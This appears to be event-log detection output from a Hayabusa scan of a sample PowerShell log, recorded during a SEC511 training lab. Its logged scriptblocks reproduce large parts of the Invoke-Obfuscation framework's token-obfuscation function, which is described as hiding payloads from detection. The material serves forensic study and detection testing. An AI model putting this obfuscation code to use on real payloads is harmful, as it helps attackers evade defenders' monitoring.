Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:21.320 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:31.954 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,cd C:\Users\student\Desktop\Invoke-Obfuscation-master\,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:31.956 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:38.671 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,Invoke-Obfuscation,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:38.711 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:38.715 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:38.716 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:38.776 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.198 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,Import-Module .\Invoke-Obfuscation.psd1,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.202 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Module manifest for module 'Invoke-Obfuscation' # # Generated by: Daniel Bohannon (@danielhbohannon) # # Generated on: 2017-01-19 # @{ # Version number of this module. ModuleVersion = '1.1' # ID used to uniquely identify this module GUID = 'd0a9150d-b6a4-4b17-a325-e3a24fed0aa9' # Author of this module Author = 'Daniel Bohannon (@danielhbohannon)' # Copyright statement for this module Copyright = 'Apache License, Version 2.0' # Description of the functionality provided by this module Description = 'PowerShell module file for importing all required modules for the Invoke-Obfuscation framework.' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' # Minimum version of the Windows PowerShell host required by this module PowerShellHostVersion = '2.0' # Script files (.ps1) that are run in the caller's environment prior to importing this module ScriptsToProcess = @('Out-ObfuscatedTokenCommand.ps1','Out-ObfuscatedStringCommand.ps1','Out-EncodedAsciiCommand.ps1','Out-EncodedHexCommand.ps1','Out-EncodedOctalCommand.ps1','Out-EncodedBinaryCommand.ps1','Out-SecureStringCommand.ps1','Out-EncodedBXORCommand.ps1','Out-EncodedSpecialCharOnlyCommand.ps1','Out-EncodedWhitespaceCommand.ps1','Out-PowerShellLauncher.ps1','Invoke-Obfuscation.ps1') # Functions to export from this module FunctionsToExport = '*' # HelpInfo URI of this module # HelpInfoURI = '' }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedTokenCommand { <# .SYNOPSIS Master function that orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedTokenCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER TokenTypeToObfuscate (Optional) Specifies the token type to obfuscate ('Command', 'CommandArgument', 'Comment', 'Member', 'String', 'Type', 'Variable', 'RandomWhitespace'). If not defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given TokenTypeToObfuscate. If not defined then Out-ObfuscatedTokenCommand will automatically perform obfuscation function at the highest available obfuscation level. Each token has different available obfuscation levels: 'Argument' 1-4 'Command' 1-3 'Comment' 1 'Member' 1-4 'String' 1-2 'Type' 1-2 'Variable' 1 'Whitespace' 1 'All' 1 .EXAMPLE C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} .( ""{0}{2}{1}"" -f'Write','t','-Hos' ) ( 'Hell' + 'o ' +'Wor'+ 'ld!' ) -ForegroundColor ( ""{1}{0}"" -f 'een','Gr') ; .( ""{1}{2}{0}""-f'ost','Writ','e-H' ) ( 'O' + 'bfusca'+ 't' + 'ion Rocks' + '!') -ForegroundColor ( ""{1}{0}""-f'een','Gr' ) .NOTES Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('Member', 'Command', 'CommandArgument', 'String', 'Variable', 'Type', 'RandomWhitespace', 'Comment')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [String] $TokenTypeToObfuscate, [Parameter(Position = 2)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = 10 # Default to highest obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # If $TokenTypeToObfuscate was not defined then we will automate randomly calling all available obfuscation functions in Out-ObfuscatedTokenCommand. If($TokenTypeToObfuscate.Length -eq 0) { # All available obfuscation token types (minus 'String') currently supported in Out-ObfuscatedTokenCommand. # 'Comment' and 'String' will be manually added first and second respectively for reasons defined below. # 'RandomWhitespace' will be manually added last for reasons defined below. $ObfuscationChoices = @() $ObfuscationChoices += 'Member' $ObfuscationChoices += 'Command' $ObfuscationChoices += 'CommandArgument' $ObfuscationChoices += 'Variable' $ObfuscationChoices += 'Type' # Create new array with 'String' plus all obfuscation types above in random order. $ObfuscationTypeOrder = @() # Run 'Comment' first since it will be the least number of tokens to iterate through, and comments may be introduced as obfuscation technique in future revisions. $ObfuscationTypeOrder += 'Comment' # Run 'String' second since otherwise we will have unnecessary command bloat since other obfuscation functions create additional strings. $ObfuscationTypeOrder += 'String' $ObfuscationTypeOrder += (Get-Random -Input $ObfuscationChoices -Count $ObfuscationChoices.Count) # Apply each randomly-ordered $ObfuscationType from above step. ForEach($ObfuscationType in $ObfuscationTypeOrder) { $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock]::Create($ScriptString)) $ObfuscationType $ObfuscationLevel } Return $ScriptString } # Parse out and obfuscate tokens (in reverse to make indexes simpler for adding in obfuscated tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) # Handle fringe case of retrieving count of all tokens used when applying random whitespace. $TokenCount = ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenTypeToObfuscate}).Count $TokensForInsertingWhitespace = @('Operator','GroupStart','GroupEnd','StatementSeparator') # Script-wide variable ($Script:TypeTokenScriptStringGrowth) to speed up Type token obfuscation by avoiding having to re-tokenize ScriptString for every token. # This is because we are appending variable instantiation at the beginning of each iteration of ScriptString. # Additional script-wide variable ($Script:TypeTokenVariableArray) allows each unique Type token to only be set once per command/script for efficiency and to create less items to create indicators off of. $Script:TypeTokenScriptStringGrowth = 0 $Script:TypeTokenVariableArray = @() If($TokenTypeToObfuscate -eq 'RandomWhitespace') { # If $TokenTypeToObfuscate='RandomWhitespace' then calculate $TokenCount for output by adding token count for all tokens in $TokensForInsertingWhitespace. $TokenCount = 0 ForEach($TokenForInsertingWhitespace in $TokensForInsertingWhitespace) { $TokenCount += ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenForInsertingWhitespace}).Count } } # Handle fringe case of outputting verbiage consistent with options presented in Invoke-Obfuscation. If($TokenCount -gt 0) { # To be consistent with verbiage in Invoke-Obfuscation we will print Argument/Whitespace instead of CommandArgument/RandomWhitespace. $TokenTypeToObfuscateToPrint = $TokenTypeToObfuscate If($TokenTypeToObfuscateToPrint -eq 'CommandArgument') {$TokenTypeToObfuscateToPrint = 'Argument'} If($TokenTypeToObfuscateToPrint -eq 'RandomWhitespace') {$TokenTypeToObfuscateToPrint = 'Whitespace'} If($TokenCount -gt 1) {$Plural = 's'} Else {$Plural = ''} # Output verbiage concerning which $TokenType is currently being obfuscated and how many tokens of each type are left to obfuscate. # This becomes more important when obfuscated large scripts where obfuscation can take several minutes due to all of the randomization steps. Write-Host ""`n[*] Obfuscating $($TokenCount)"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" token$Plural."" } # Variables for outputting status of token processing for large token counts when obfuscating large scripts. $Counter = $TokenCount $OutputCount = 0 $IterationsToOutputOn = 100 $DifferenceForEvenOutput = $TokenCount % $IterationsToOutputOn For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Extra output for large scripts with several thousands tokens (like Invoke-Mimikatz). If(($TokenCount -gt $IterationsToOutputOn*2) -AND ((($TokenCount-$Counter)-($OutputCount*$IterationsToOutputOn)) -eq ($IterationsToOutputOn+$DifferenceForEvenOutput))) { $OutputCount++ $ExtraWhitespace = ' '*(([String]($TokenCount)).Length-([String]$Counter).Length) If($Counter -gt 0) { Write-Host ""[*] $ExtraWhitespace$Counter"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" tokens remaining to obfuscate."" } } $ObfuscatedToken = """" If(($Token.Type -eq 'String') -AND ($TokenTypeToObfuscate.ToLower() -eq 'string')) { $Counter-- # If String $Token immediately follows a period (and does not begin $ScriptString) then do not obfuscate as a String. # In this scenario $Token is originally a Member token that has quotes added to it. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If(($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) { Continue } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Binding Validation Attributes cannot have their string values formatted with the -f format operator unless treated as a scriptblock. # When we find strings following these Parameter Binding Validation Attributes then if we are using a -f format operator we will treat the result as a scriptblock. # Source: https://technet.microsoft.com/en-us/library/hh847743.aspx $ParameterValidationAttributesToTreatStringAsScriptblock = @() $ParameterValidationAttributesToTreatStringAsScriptblock += 'alias' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allownull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptystring' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptycollection' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatecount' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatelength' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatepattern' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validaterange' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatescript' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validateset' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnullorempty' $ParameterValidationAttributesToTreatStringAsScriptblock += 'helpmessage' $ParameterValidationAttributesToTreatStringAsScriptblock += 'confirmimpact' $ParameterValidationAttributesToTreatStringAsScriptblock += 'outputtype' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Member') -AND ($TokenTypeToObfuscate.ToLower() -eq 'member')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Attributes cannot be obfuscated like other Member Tokens, so we will only randomize the case of these tokens. # Source 1: https://technet.microsoft.com/en-us/library/hh847743.aspx $MemberTokensToOnlyRandomCase = @() $MemberTokensToOnlyRandomCase += 'mandatory' $MemberTokensToOnlyRandomCase += 'position' $MemberTokensToOnlyRandomCase += 'parametersetname' $MemberTokensToOnlyRandomCase += 'valuefrompipeline' $MemberTokensToOnlyRandomCase += 'valuefrompipelinebypropertyname' $MemberTokensToOnlyRandomCase += 'valuefromremainingarguments' $MemberTokensToOnlyRandomCase += 'helpmessage' $MemberTokensToOnlyRandomCase += 'alias' # Source 2: https://technet.microsoft.com/en-us/library/hh847872.aspx $MemberTokensToOnlyRandomCase += 'confirmimpact' $MemberTokensToOnlyRandomCase += 'defaultparametersetname' $MemberTokensToOnlyRandomCase += 'helpuri' $MemberTokensToOnlyRandomCase += 'supportspaging' $MemberTokensToOnlyRandomCase += 'supportsshouldprocess' $MemberTokensToOnlyRandomCase += 'positionalbinding' $MemberTokensToOnlyRandomCase += 'ignorecase' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 1} 4 {$ScriptString = Out-ObfuscatedMemberTokenLevel3 $ScriptString $Tokens $i 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'CommandArgument') -AND ($TokenTypeToObfuscate.ToLower() -eq 'commandargument')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-RandomCaseToken $ScriptString $Token} 2 {$ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token} 3 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} 4 {$ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-ObfuscatedTokenCommand { <# .SYNOPSIS Master function that orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script. Invoke-Obfuscation Function: Out-ObfuscatedTokenCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER TokenTypeToObfuscate (Optional) Specifies the token type to obfuscate ('Command', 'CommandArgument', 'Comment', 'Member', 'String', 'Type', 'Variable', 'RandomWhitespace'). If not defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. .PARAMETER ObfuscationLevel (Optional) Specifies the obfuscation level for the given TokenTypeToObfuscate. If not defined then Out-ObfuscatedTokenCommand will automatically perform obfuscation function at the highest available obfuscation level. Each token has different available obfuscation levels: 'Argument' 1-4 'Command' 1-3 'Comment' 1 'Member' 1-4 'String' 1-2 'Type' 1-2 'Variable' 1 'Whitespace' 1 'All' 1 .EXAMPLE C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} .( ""{0}{2}{1}"" -f'Write','t','-Hos' ) ( 'Hell' + 'o ' +'Wor'+ 'ld!' ) -ForegroundColor ( ""{1}{0}"" -f 'een','Gr') ; .( ""{1}{2}{0}""-f'ost','Writ','e-H' ) ( 'O' + 'bfusca'+ 't' + 'ion Rocks' + '!') -ForegroundColor ( ""{1}{0}""-f'een','Gr' ) .NOTES Out-ObfuscatedTokenCommand orchestrates the tokenization and application of all token-based obfuscation functions to provided PowerShell script and places obfuscated tokens back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. If no $TokenTypeToObfuscate is defined then Out-ObfuscatedTokenCommand will automatically perform ALL token obfuscation functions in random order at the highest obfuscation level. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('Member', 'Command', 'CommandArgument', 'String', 'Variable', 'Type', 'RandomWhitespace', 'Comment')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [String] $TokenTypeToObfuscate, [Parameter(Position = 2)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = 10 # Default to highest obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # If $TokenTypeToObfuscate was not defined then we will automate randomly calling all available obfuscation functions in Out-ObfuscatedTokenCommand. If($TokenTypeToObfuscate.Length -eq 0) { # All available obfuscation token types (minus 'String') currently supported in Out-ObfuscatedTokenCommand. # 'Comment' and 'String' will be manually added first and second respectively for reasons defined below. # 'RandomWhitespace' will be manually added last for reasons defined below. $ObfuscationChoices = @() $ObfuscationChoices += 'Member' $ObfuscationChoices += 'Command' $ObfuscationChoices += 'CommandArgument' $ObfuscationChoices += 'Variable' $ObfuscationChoices += 'Type' # Create new array with 'String' plus all obfuscation types above in random order. $ObfuscationTypeOrder = @() # Run 'Comment' first since it will be the least number of tokens to iterate through, and comments may be introduced as obfuscation technique in future revisions. $ObfuscationTypeOrder += 'Comment' # Run 'String' second since otherwise we will have unnecessary command bloat since other obfuscation functions create additional strings. $ObfuscationTypeOrder += 'String' $ObfuscationTypeOrder += (Get-Random -Input $ObfuscationChoices -Count $ObfuscationChoices.Count) # Apply each randomly-ordered $ObfuscationType from above step. ForEach($ObfuscationType in $ObfuscationTypeOrder) { $ScriptString = Out-ObfuscatedTokenCommand ([ScriptBlock]::Create($ScriptString)) $ObfuscationType $ObfuscationLevel } Return $ScriptString } # Parse out and obfuscate tokens (in reverse to make indexes simpler for adding in obfuscated tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) # Handle fringe case of retrieving count of all tokens used when applying random whitespace. $TokenCount = ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenTypeToObfuscate}).Count $TokensForInsertingWhitespace = @('Operator','GroupStart','GroupEnd','StatementSeparator') # Script-wide variable ($Script:TypeTokenScriptStringGrowth) to speed up Type token obfuscation by avoiding having to re-tokenize ScriptString for every token. # This is because we are appending variable instantiation at the beginning of each iteration of ScriptString. # Additional script-wide variable ($Script:TypeTokenVariableArray) allows each unique Type token to only be set once per command/script for efficiency and to create less items to create indicators off of. $Script:TypeTokenScriptStringGrowth = 0 $Script:TypeTokenVariableArray = @() If($TokenTypeToObfuscate -eq 'RandomWhitespace') { # If $TokenTypeToObfuscate='RandomWhitespace' then calculate $TokenCount for output by adding token count for all tokens in $TokensForInsertingWhitespace. $TokenCount = 0 ForEach($TokenForInsertingWhitespace in $TokensForInsertingWhitespace) { $TokenCount += ([System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq $TokenForInsertingWhitespace}).Count } } # Handle fringe case of outputting verbiage consistent with options presented in Invoke-Obfuscation. If($TokenCount -gt 0) { # To be consistent with verbiage in Invoke-Obfuscation we will print Argument/Whitespace instead of CommandArgument/RandomWhitespace. $TokenTypeToObfuscateToPrint = $TokenTypeToObfuscate If($TokenTypeToObfuscateToPrint -eq 'CommandArgument') {$TokenTypeToObfuscateToPrint = 'Argument'} If($TokenTypeToObfuscateToPrint -eq 'RandomWhitespace') {$TokenTypeToObfuscateToPrint = 'Whitespace'} If($TokenCount -gt 1) {$Plural = 's'} Else {$Plural = ''} # Output verbiage concerning which $TokenType is currently being obfuscated and how many tokens of each type are left to obfuscate. # This becomes more important when obfuscated large scripts where obfuscation can take several minutes due to all of the randomization steps. Write-Host ""`n[*] Obfuscating $($TokenCount)"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" token$Plural."" } # Variables for outputting status of token processing for large token counts when obfuscating large scripts. $Counter = $TokenCount $OutputCount = 0 $IterationsToOutputOn = 100 $DifferenceForEvenOutput = $TokenCount % $IterationsToOutputOn For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Extra output for large scripts with several thousands tokens (like Invoke-Mimikatz). If(($TokenCount -gt $IterationsToOutputOn*2) -AND ((($TokenCount-$Counter)-($OutputCount*$IterationsToOutputOn)) -eq ($IterationsToOutputOn+$DifferenceForEvenOutput))) { $OutputCount++ $ExtraWhitespace = ' '*(([String]($TokenCount)).Length-([String]$Counter).Length) If($Counter -gt 0) { Write-Host ""[*] $ExtraWhitespace$Counter"" -NoNewLine Write-Host "" $TokenTypeToObfuscateToPrint"" -NoNewLine -ForegroundColor Yellow Write-Host "" tokens remaining to obfuscate."" } } $ObfuscatedToken = """" If(($Token.Type -eq 'String') -AND ($TokenTypeToObfuscate.ToLower() -eq 'string')) { $Counter-- # If String $Token immediately follows a period (and does not begin $ScriptString) then do not obfuscate as a String. # In this scenario $Token is originally a Member token that has quotes added to it. # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript If(($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) { Continue } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Binding Validation Attributes cannot have their string values formatted with the -f format operator unless treated as a scriptblock. # When we find strings following these Parameter Binding Validation Attributes then if we are using a -f format operator we will treat the result as a scriptblock. # Source: https://technet.microsoft.com/en-us/library/hh847743.aspx $ParameterValidationAttributesToTreatStringAsScriptblock = @() $ParameterValidationAttributesToTreatStringAsScriptblock += 'alias' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allownull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptystring' $ParameterValidationAttributesToTreatStringAsScriptblock += 'allowemptycollection' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatecount' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatelength' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatepattern' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validaterange' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatescript' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validateset' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnull' $ParameterValidationAttributesToTreatStringAsScriptblock += 'validatenotnullorempty' $ParameterValidationAttributesToTreatStringAsScriptblock += 'helpmessage' $ParameterValidationAttributesToTreatStringAsScriptblock += 'confirmimpact' $ParameterValidationAttributesToTreatStringAsScriptblock += 'outputtype' Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 1} 2 {$ScriptString = Out-ObfuscatedStringTokenLevel1 $ScriptString $Token 2} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for token type $($Token.Type).""; Exit;} } } ElseIf(($Token.Type -eq 'Member') -AND ($TokenTypeToObfuscate.ToLower() -eq 'member')) { $Counter-- # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3,4) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} # The below Parameter Attributes cannot be obfuscated like other Member Tokens, so we will only randomize the case of these tokens. # Source 1: https://technet.microsoft.com/en-us/library/hh847743.aspx $MemberTokensToOnlyRandomCase = @() $MemberTokensToOnlyRandomCase += 'mandatory' 